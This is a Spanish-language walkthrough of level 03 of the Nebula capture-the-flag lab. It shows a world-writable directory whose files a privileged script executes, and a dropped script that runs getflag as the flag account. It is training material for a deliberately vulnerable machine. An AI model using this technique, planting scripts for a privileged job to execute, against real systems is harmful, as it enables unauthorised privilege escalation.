Nebula CTF - level03

Veamos que nos encontramos en el siguiente nivel:

level03@nebula:/home/flag03$ ls -al
total 6
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

Un directorio con permisos de escritura para todo el mundo pinta de por sí peligroso. Veamos el contenido del script:

level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
 (ulimit -t 5; bash -x "$i")
 rm -f "$i"
done

Uff! Vemos que lanza uno por uno todos los ejecutables presentes en /home/flag03/writable.d/ y luego los borra. Aprovechamos la oportunidad, creamos un script y le damos permisos de ejecución mediante:

nano writable.d/pwned.sh; chmod +x writable.d/pwned.sh:

El contenido:

#!/bin/bash

/bin/getflag > /tmp/pwned

Al cabo de unos segundos...

level03@nebula:/home/flag03$ cat /tmp/pwned
You have successfully executed getflag on a target account

Pwned!